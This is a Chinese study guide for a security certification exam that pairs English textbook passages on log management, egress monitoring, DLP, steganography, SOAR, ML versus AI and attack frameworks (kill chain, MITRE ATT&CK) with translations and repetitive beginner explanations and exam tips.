这些过程有时被称为 网络流监控。 它可以推断出大 量信息,例如主要和备用通信路径、主服务器的位置、加密流量的来源、网络支 持的流量规模、流量的典型流向、通信频率等。 这些技术有时可以揭示可疑的流量模式,例如当员工账户向其他人发送大量电 子邮件时。 这可能表明该员工的系统是位于远程位置的攻击者控制的僵尸网络 的一部分。 类似地,流量分析可能检测到

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:高层原则、最低要求、操作步骤、建议做法要分清。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

加密:加密把内容变成未授权者看不懂的形式。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“政策、标准、程序、指南”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
加密 加密把内容变成未授权者看不懂的形式。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 59 / PDF P1196

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

unscrupulous insider forwards internal information to unauthorized parties via email. These types of events often leave detectable signatures. Log Management Log management refers to all the methods used to collect, process, and protect log entries. As discussed previously, a SIEM system collects and aggregates log entries from multiple systems. It then analyzes these entries and reports any suspicious events. After a system forwards log entries to a SIEM system, it's acceptable to delete the log entries. However, these usually aren't deleted from the original system right away. Instead, systems typically use rollover logging, sometimes called circular logging or log cycling.

Rollover logging allows administrators to set a maximum log size. When the log reaches that size, the system begins overwriting the oldest events in the log. Windows systems allow administrators to archive logs, which is useful if a SIEM system isn't available. When the option to archive logs is selected and the log reaches the maximum size, the system will save the log as a new file and start a new log. The danger here is that the system disk drive could fill with these archived log files. Another option is to create and schedule a PowerShell script to regularly archive the files and copy them to another location, such as a backup server using a UNC path.

The key is to implement a method that will save the log entries and prevent the logs from filling a disk drive. Egress Monitoring Monitoring traffic isn't limited to traffic within a network or entering a network. It's also important to monitor traffic leaving a network to the Internet, also called egress monitoring. This can detect the unauthorized transfer of data outside the organization, often referred to as data exfiltration. Some common methods used to detect or prevent data exfiltration are data loss prevention (DLP) techniques and monitoring for steganography.

中文直译 / 整理

不良内部人员通过电子邮件将内部信息转发给未经授权的第三方。 这类事件通常 会留下可检测的痕迹。 日志管理 日志管理是指用于收集、处理和保护日志条目的所有方法。 如前所述, SIEM 系统会从多个系统收集并聚合日志条目,然后分析这些条目并报告任 何可疑事件。 系统将日志条目转发到 SIEM 系统后,删除这些日志条目是可以接受的。 然而, 这些日志通常不会立即从原始系统中删除。 相反,系统通常使用 轮转日志,有 时也称为循环日志或日志循环。 轮转日志允许管理员设置最大日志大小。 当日 志达到该大小时,系统将开始覆盖日志中最旧的事件。 Windows 系统允许管理员归档日志,这在没有 SIEM 系统时非常有用。 当 选择归档日志选项且日志达到最大大小时,系统会将日志保存为新文件并启 动一个新的日志。 此处的风险是,系统磁盘驱动器可能会被这些归档日志文 件填满。 另一种选择是创建并计划一个 PowerShell 脚本,定期归档文件并将其复制 到另一个位置,例如使用 UNC 路径的备份服务器。 关键是实施一种方法, 以保存日志条目并防止日志填满磁盘驱动器。 出口监控 监控流量不仅限于网络内部或进入网络的流量。

监控离开网络到互联网的流量 (也称为出口监控)同样重要。 这可以检测到未经授权的数据外传,通常称为 数据外泄。 用于检测或防止数据外泄的一些常见方法包括数据丢失防护( DLP)技术和对隐写术的监控。

小白解释

场景先行:新员工入职后要登录系统。第一步是声明身份,第二步证明身份,第三步决定能访问哪些数据,最后系统要记录他做了什么。IAM 题就是围绕这条链条出题。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:认证成功不代表什么都能做;离职、调岗、权限漂移都会造成越权。

你作为负责人可以这样想:把识别、认证、授权、审计分开看,再用最小权限和定期复核收口。

本页术语用人话说:

授权:授权是认证之后决定你能访问什么、能做什么。

NIST:NIST 提供美国常用安全标准、框架和指南。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

读完后用一句话复述:如果我是IAM 管理员,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是IAM 管理员在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

认证成功不等于什么都能做;权限仍要单独授权。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把 authentication 和 authorization 混成一件事:前者证明你是谁,后者决定你能干什么。

本页术语拆解
授权 授权是认证之后决定你能访问什么、能做什么。
NIST NIST 提供美国常用安全标准、框架和指南。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 60 / PDF P1197

第 1197 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Chapter 7 covers steganography and watermarking in more depth and Chapter 5, “Protecting Security of Assets,” covers DLP in more depth. Steganography allows attackers to embed messages within other files such as graphic or audio files. It is possible to detect steganography attempts if you have both the original file and a file you suspect has a hidden message. If you use a hashing algorithm such as Secure Hash Algorithm 3 (SHA-3), you can create a hash of both files. If the hashes are the same, the file does not have a hidden message. However, if the hashes are different, it indicates the second file has been modified. Forensic analysis techniques might be able to retrieve the message.

An organization can periodically capture hashes of internal files that rarely change. For example, graphics files such as JPEG and GIF files generally stay the same. Imagine security experts suspect that a malicious insider is embedding additional data within these files and emailing them outside the organization. In that case, they can compare the original hashes with the hashes of the files the malicious insider sent out. If the hashes are different, it indicates the files are different and may contain hidden messages. An advanced implementation of watermarking is digital watermarking. A digital watermark is a secretly embedded marker in a digital file.

For example, some movie studios digitally mark copies of movies sent to different distributors. Each copy has a different mark, and the studios track which distributor received which copy. If any of the distributors release pirated copies of the movie, the studio can identify which distributor did so. DLP systems can detect watermarks in unencrypted files. When a DLP system identifies sensitive data from these watermarks, it can block the transmission and raise an alert for security personnel. This prevents the transmission of the files outside the organization.

Advanced attackers, such as advanced persistent threats sponsored by nationstates, commonly encrypt data before sending it out of the network. This can thwart some common tools that attempt to detect data exfiltration. Although a DLP system can't examine content from encrypted data, it can monitor the volume of encrypted data going out of a network, where it's going, and which

中文直译 / 整理

第7章更深入地介绍了隐写术和数字水印,第5章“保护资产安全”更 深入地介绍了DLP。 隐写术允许攻击者将消息嵌入其他文件中,例如图形或音频文件。 如果您同时 拥有原始文件和疑似包含隐藏消息的文件,则有可能检测到隐写术的尝试。 如 果您使用安全哈希算法3(SHA‑3)等哈希算法,可以为这两个文件生成哈希 值。 如果哈希值相同,则说明该文件没有隐藏消息。 然而,如果哈希值不同, 则表明第二个文件已被修改。 取证分析技术可能能够恢复该消息。 组织可以定期捕获那些很少更改的内部文件的哈希值。 例如,JPEG 和 GIF 等 图形文件通常保持不变。 假设安全专家怀疑有恶意内部人员将额外数据嵌入这 些文件并通过电子邮件发送到组织外部,那么他们可以将原始哈希值与恶意内 部人员发出的文件的哈希值进行比较。 如果哈希值不同,则表明文件内容不同, 可能包含隐藏消息。 水印技术的一种高级实现是数字水印。 一个数字水印是嵌入在数字文件中的秘 密标记。 例如,一些电影公司会为发送给不同发行商的电影副本添加数字标记。 每个副本都有不同的标记,公司可以追踪哪个发行商收到了哪个副本。 如果任 何发行商发布了盗版电影副本,公司就能识别出是哪个发行商所为。

DLP系统可以检测未加密文件中的水印。 当DLP系统通过这些水印识别出 敏感数据时,它可以阻止传输并为安全人员发出警报。 这可以防止文件被 传出组织之外。 高级攻击者,例如由国家支持的高级持续性威胁,通常在将数据传出网络前对 其进行加密。 这可能会阻止一些试图检测数据外泄的常用工具。 尽管DLP系统 无法检查加密数据的内容,但它可以监控传出网络的加密数据量、数据去向以 及哪个

小白解释

场景先行:财务要把合同发给供应商:不想被别人看懂,要加密;不想被人改金额,要校验完整性;不想对方抵赖,要签名和证书。密码学不是炫技,是解决这些业务信任问题。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:把加密、哈希、签名混在一起,会导致控制目标错位。

你作为负责人可以这样想:机密性用加密,完整性用哈希/签名,身份信任用证书和 PKI。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

资产:资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。

哈希:哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。

常见误区:哈希不是加密;签名也不是为了隐藏内容。

读完后用一句话复述:如果我是系统架构师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1197 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是系统架构师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

资产安全题先问资产是谁拥有、如何分类、谁负责保护。

哈希本身不提供机密性;它主要用于完整性校验。

排除法提醒:哈希不是加密;签名也不是为了隐藏内容。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
资产 资产是组织认为有价值、需要保护的东西,可以是数据、系统、人员、设施或声誉。
哈希 哈希把任意长度数据变成固定长度摘要,用于校验是否被改过。
学习单元 61 / PDF P1198

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

system sent it. Administrators can configure DLP systems to look for abnormalities related to encrypted traffic, such as an increase in volume. However, it's also possible to include tools that monitor the amount of encrypted data sent out of the network. Automating Incident Response Incident response automation has improved considerably over the years, and it continues to improve. The following sections describe some of these improvements, such as security orchestration, automation, and response (SOAR), artificial intelligence (AI), and threat intelligence techniques.

Understanding SOAR Security orchestration, automation, and response (SOAR) refers to a group of technologies that allow organizations to respond to some incidents automatically. Organizations have a variety of tools that warn about potential incidents. Traditionally, security administrators respond to each warning manually. This typically requires them to verify the warning is valid and then respond. Many times, they perform the same rote actions that they've done before. As an example, imagine attackers have launched a SYN flood attack on servers in a screened subnet (sometimes referred to as a demilitarized zone). Network tools detect the attack and raise alerts.

The organization has policies in place where security administrators verify the alerts are valid. If so, they manually change the amount of time a server will wait for an ACK packet. After the attack has stopped, they manually change the time back to its original setting. Depending on the event, it can raise an alarm for an administrator or take some other action. For example, if an email server's send queue starts backing up, a SIEM application can detect the issue and alert administrators before the problem is serious.

SOAR allows security administrators to define these incidents and the response, typically using playbooks and runbooks: Playbook A playbook is a document or checklist that defines how to verify an incident. Additionally, it gives details on the response. A playbook for the SYN flood attack would list the same actions security administrators take to

中文直译 / 整理

系统发送了这些数据。 管理员可以配置DLP系统,以查找与加密流量相关的 异常情况,例如流量体积增加。 然而,也可以包含监控从网络传出的加密数据量的工具。 自动化事件响应 多年来,事件响应自动化已有显著改进,并且仍在持续提升。 以下部分将介绍 一些此类改进,例如安全编排、自动化和响应(SOAR)、人工智能(AI)以 及威胁情报技术。 了解SOAR 安全编排、自动化和响应(SOAR) 指的是一组允许组织自动响应某些事件的 技术。 组织拥有多种工具来预警潜在事件。 传统上,安全管理员会手动响应每 个警报。 这通常要求他们验证警报的有效性,然后做出响应。 很多时候,他们 重复执行之前做过的一成不变的操作。 举个例子,假设攻击者对筛选子网(有时称为非军事区)中的服务器发起了 SYN洪水攻击。 网络工具检测到该攻击并发出警报。 组织已制定相关政策,要 求安全管理员验证警报的有效性。 如果确认有效,他们则手动更改服务器等待 ACK数据包的时间。 在攻击停止后,他们再手动将时间改回原始设置。 根据事件的不同,系统可能会向管理员发出警报或采取其他操作。

例如,如 果邮件服务器的发送队列开始积压,SIEM应用程序可以检测到该问题,并在 问题变得严重之前通知管理员。 SOAR允许安全管理员定义这些事件及其响应,通常使用剧本和运行手册: Playbook 一个Playbook是定义如何验证事件的文档或检查清单。 此外,它还 提供了响应的详细信息。 针对SYN洪水攻击的Playbook会列出安全管理员为

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

加密:加密把内容变成未授权者看不懂的形式。

NIST:NIST 提供美国常用安全标准、框架和指南。

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

加密主要保护机密性,也可配合签名、哈希支持完整性和真实性。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
加密 加密把内容变成未授权者看不懂的形式。
NIST NIST 提供美国常用安全标准、框架和指南。
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
日志 日志记录系统和用户活动,用于监控、审计和调查。
事件响应 事件响应是发现、遏制、根除、恢复并复盘安全事件的过程。
学习单元 62 / PDF P1199

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

verify a SYN flood is under way. It would also list the steps administrators take after verifying it is a SYN flood attack. Runbook A runbook implements the playbook data into an automated tool. For example, if an IDS alerts on the traffic, it implements a set of conditional steps to verify that the traffic is a SYN flood attack using the playbook's criteria. If the IDS confirms the attack, it then performs specified actions to mitigate the threat. It's worth noting that there aren't definitive definitions of a playbook and a runbook that all companies use. For example, some BCP experts say that a runbook refers to computers and networks, whereas a playbook refers to the business in general.

However, within the context of incident response, a playbook is a document that defines actions, and the runbook implements those actions. This scenario shows a single attack and response, but SOAR technologies can respond to any attacks. The hard part is documenting all known incidents and responses in the playbooks and then configuring tools to respond automatically. It's important to realize that the playbooks’ primary purpose is to document what the runbooks should do. However, playbooks can be used as a manual backup if the SOAR system fails. In other words, if a runbook fails to run after an incident, administrators can still refer to the playbook to complete the steps manually.

Machine Learning and AI Tools Many companies (especially those with something to sell) use the terms artificial intelligence (AI) and machine learning (ML) interchangeably, as though they are synonymous. However, they aren't. Unfortunately, there aren't strict definitions of these terms that everyone agrees on and follows. Marketers may use them synonymously. Scientists creating ML and AI systems have much more complex definitions that have morphed over time. However, the following bullets provide general descriptions of the term: Machine learning is a part of artificial intelligence and refers to a system that can improve automatically through experience. ML gives computer

中文直译 / 整理

验证SYN洪水攻击是否正在发生所采取的相同操作。 它还会列出管理员在确认 是SYN洪水攻击后所采取的步骤。 运行手册 运行手册将剧本数据实现为自动化工具。 例如,如果IDS对流量发出 警报,它会根据剧本的标准执行一系列条件步骤,以验证该流量是否为SYN洪 水攻击。 如果IDS确认了攻击,则执行指定的操作以减轻威胁。 值得注意的是,各公司对剧本和运行手册并没有统一的明确定义。 例 如,一些BCP专家认为,运行手册指的是计算机和网络,而剧本则指代整 体业务。 然而,在事件响应的背景下,剧本是一个定义操作的文档,而运 行手册则负责实施这些操作。 此场景展示了一次单一攻击与响应,但SOAR技术可以应对任何攻击。 难点在 于将所有已知的事件和响应记录在剧本中,然后配置工具以自动响应。 重要的是要认识到,剧本的主要目的是记录运行手册应执行的操作。 然而, 如果SOAR系统出现故障,剧本也可作为手动备份使用。 换句话说,如果在事 件发生后运行手册未能执行,管理员仍可参考剧本手动完成相关步骤。 机器学习与人工智能工具 许多公司(尤其是那些有产品要销售的公司)经常将人工智能(AI)和机器 学习(ML)这两个术语互换使用,仿佛它们是同义词。

然而,它们并非如此。 不幸的是,目前还没有所有人都认同并遵循的严格定义。 营销人员可能会将 它们视为同义词,而开发ML和AI系统的科学家则有更复杂的定义,这些定义 随着时间推移不断演变。 不过,以下要点提供了这些术语的一般性描述: 机器学习是人工智能的一部分,指一种能够通过经验自动改进的系统。 机器学 习使计算机

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

标准:标准给出必须满足的最低要求。

入侵检测系统 IDS:IDS 负责发现可疑行为并告警,一般不直接阻断。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Minimum level、mandatory requirement 常对应 standard。

检测是 IDS,主动阻断更像 IPS。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
标准 标准给出必须满足的最低要求。
入侵检测系统 IDS IDS 负责发现可疑行为并告警,一般不直接阻断。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
日志 日志记录系统和用户活动,用于监控、审计和调查。
事件响应 事件响应是发现、遏制、根除、恢复并复盘安全事件的过程。
业务连续性计划 BCP BCP 关注业务在灾难或中断中如何继续运行。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 63 / PDF P1200

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

systems the ability to learn. Artificial intelligence is a broad field that includes ML. It gives machines the ability to do things that a human can do better or allows a machine to perform tasks that we previously thought required human intelligence. This is a moving target, though. The idea of a car parking itself or coming to you from a parking spot was once thought to require human intelligence. Cars can now do these tasks without human interaction. A key point is that machine learning is a part of the broad topic of AI. From a simple perspective, consider machine learning and AI applied to the game of Go.

A machine-learning algorithm will outline the rules of the game, such as how the pieces move, legal moves, and what a win looks like. The machine will use these rules to play games against itself repeatedly. With each game, it adds to its experience level, and it progressively gets better and better. Over time, it learns what strategies work and what strategies don't work. In contrast, an AI system starts with zero knowledge of the game. It doesn't know how the pieces move, what moves are legal, or even what a win looks like. However, a separate algorithm outside of the AI system enforces the rules. It tells the AI system when it makes an illegal move and when it wins or loses a game.

The AI system uses this feedback to create its own algorithms as it is learning the rules. As it creates these algorithms, it applies machine-learning techniques to teach itself winning strategies. These two examples demonstrate the major difference between machine learning and AI. A machine-learning system (part of AI) starts with a set of rules or guidelines. An AI system starts with nothing and progressively learns the rules. It then creates its own algorithms as it learns the rules and applies machine-learning techniques based on these rules. Think of a behavior-based detection system as one way machine learning and artificial intelligence can apply to cybersecurity.

As a reminder, administrators need to create a baseline of normal activities and traffic on a network. If the network is modified, administrators need to re-create the baseline. In this case, the baseline is similar to a set of rules given to a machine-learning system. A machine-learning system would use this baseline as a starting point. During normal operation, it detects anomalies and reports them. If an administrator investigates and reports it as a false positive, the machine-

中文直译 / 整理

系统具有学习能力。 人工智能是一个广泛的领域,包括机器学习。 它使机器能够完成人类可以 做得更好的事情,或者让机器执行我们过去认为需要人类智能的任务。 然 而,这是一个不断变化的目标。 曾经认为汽车自动泊车或从停车位驶向你 需要人类智能,但现在这些任务汽车可以在无人干预的情况下完成。 一个关键点是,机器学习是人工智能这一广泛主题的一部分。 从简单的角度来 看,可以考虑将机器学习和人工智能应用于围棋游戏。 机器学习算法会概述游戏的规则,例如棋子如何移动、合法走法以及胜利的条 件是什么。 机器会利用这些规则反复与自己对弈。 每下一盘棋,它都会积累经 验,并逐步变得越来越好。 随着时间推移,它会学习哪些策略有效,哪些策略 无效。 相比之下,一个AI系统对游戏一无所知。 它不知道棋子如何移动、哪些走法合 法,甚至不知道胜利的条件是什么。 然而,一个独立于AI系统之外的算法会强 制执行规则,告诉AI系统何时走了非法走法,何时赢或输。 AI系统利用这些反 馈在学习规则的过程中创建自己的算法。 随着它创建这些算法,它会应用机器 学习技术来教导自己获胜策略。 这两个示例展示了机器学习与人工智能之间的主要区别。

机器学习系统(人工 智能的一部分)从一组规则或指南开始。 人工智能系统则从零开始,逐步学习 规则。 随后,它在学习规则的过程中创建自己的算法,并基于这些规则应用机 器学习技术。 将基于行为的检测系统视为机器学习和人工智能在网络安全中应用的一种方式。 提醒一下,管理员需要创建网络中正常活动和流量的基线。 如果网络发生更改, 管理员需要重新创建基线。 在这种情况下,基线类似于提供给机器学习系统的 一组规则。 机器学习系统会将此基线作为起点。 在正常运行期间,它会检测异常并报 告它们。 如果管理员调查后将其报告为误报,则机器‑

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

指南:指南是建议做法,不一定强制。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

Recommended、not compulsory 常对应 guideline。

网络题先定位层次,再判断协议、设备或攻击位置。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
指南 指南是建议做法,不一定强制。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
学习单元 64 / PDF P1201

安全控制框架:用成熟框架组织安全

框架帮助组织系统化管理控制,而不是想到哪做到哪。

教材原文段落

learning system learns from this feedback. It modifies the initial baseline based on feedback it receives about valid alarms and false positives. An AI system starts without a baseline. Instead, it monitors traffic and slowly creates its own baseline based on the traffic it observes. As it creates the baseline, it also looks for anomalies. An AI system also relies on feedback from administrators to learn if alarms are valid or false positives. Threat Intelligence Threat intelligence refers to gathering data on potential threats. It includes using various sources to get timely information on current threats. Many organizations used it to hunt out threats.

Understanding the Kill Chain The military has used a kill chain model to disrupt attacks for decades. The military model has a lot of depth, but in short, it includes the following phases: 1. Find or identify a target through reconnaissance. 2. Get the target's location. 3. Track the target's movement. 4. Select a weapon to use on the target. 5. Engage the target with the selected weapon. 6. Evaluate the effectiveness of the attack. It's important to know that the military uses this model for both offense and defense. When attacking, they go through each of the phases as an ordered chain of events.

However, they know that the enemy is likely using a similar model, so they attempt to break the chain. If the attacker fails at any stage of the attack chain, the attack will not succeed. Several organizations have adapted the military kill chain to create cyber kill chain models. For example, Lockheed Martin created the Cyber Kill Chain Framework. It includes seven ordered stages of an attack: Reconnaissance Attackers gather information on the target. Weaponization Attackers identify an exploit that the target is vulnerable to, along with methods to send the exploit.

中文直译 / 整理

学习系统会从这种反馈中学习。 它会根据收到的关于有效警报和误报的反馈修 改初始基线。 AI系统启动时没有基线。 相反,它会监控流量,并根据所观察到的流量逐步创 建自己的基线。 在创建基线的同时,它也会寻找异常情况。 AI系统还依赖管理 员的反馈来判断警报是有效警报还是误报。 威胁情报 威胁情报是指收集有关潜在威胁的数据。 它包括利用各种来源获取有关当前 威胁的及时信息。 许多组织用它来发现威胁。 理解杀伤链 几十年来,军队一直使用杀伤链模型来破坏攻击。 该军事模型具有很高的深 度,但简而言之,它包括以下阶段: 1. 通过侦察发现或识别目标。 2. 获取目标的位置。 3. 跟踪目标的移动。 4. 选择一种武器用于目标。 5. 使用选定的武器攻击目标。 6. 评估攻击的有效性。 重要的是要知道,军队使用此模型进行进攻和防御。 在进攻时,他们会按顺序 依次执行各个阶段。 然而,他们知道敌人很可能也在使用类似的模型,因此会 试图打断这一链条。 如果攻击方在攻击链条的任何阶段失败,攻击将不会成功。 多个组织已将军事杀伤链应用于创建网络杀伤链模型。 例如,洛克希德·马丁 公司创建了网络杀伤链框架。

它包括攻击的七个有序阶段: 侦察 攻击者收集有关目标的信息。 武器化 攻击者识别目标易受攻击的漏洞,以及发送漏洞的方法。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:框架帮助组织系统化管理控制,而不是想到哪做到哪。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

NIST:NIST 提供美国常用安全标准、框架和指南。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“安全控制框架:用成熟框架组织安全”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

看到 SP 800 系列、CSF、RMF 常联想到 NIST。

网络题先定位层次,再判断协议、设备或攻击位置。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
NIST NIST 提供美国常用安全标准、框架和指南。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
学习单元 65 / PDF P1202

政策、标准、程序、指南

高层原则、最低要求、操作步骤、建议做法要分清。

教材原文段落

Delivery Attackers send the weapon to the target via phishing attacks, malicious email attachments, compromised websites, or other common social engineering methods. Exploitation. The weapon exploits a vulnerability on the target system. Installation. Code that exploits the vulnerability then installs malware. The malware typically includes a backdoor, allowing the target to access the system remotely. Command and Control. Attackers maintain a command-and-control system, which controls the target and other compromised systems. Actions on objectives.

Attackers execute their original goals such as theft of money, theft of data, data destruction, or installing additional malicious code such as ransomware. As with the military model, the goal is to disrupt the chain by stopping the attacker at any phase of the attack. As an example, if users avoid all the social engineering methods, the attacker can't deliver the weapon, and the attacker can't succeed. Understanding the MITRE ATT&CK The MITRE ATT&CK Matrix (created by MITRE and viewable at http://attack.mitre.org) is a knowledge base of identified tactics, techniques, and procedures (TTPs) used by malicious actors in various attacks.

It is complementary to kill chain models, such as the Cyber Kill Chain. However, unlike kill chain models, the tactics are not an ordered set of attacks. Instead, MITRE ATT&CK lists the TTPs within a matrix. Additionally, malicious actors are constantly modifying their attack methods, so the ATT&CK Matrix is a living document that is updated at least twice a year. The matrix includes the following tactics: Reconnaissance Resource development Initial access Execution Persistence Privilege escalation

中文直译 / 整理

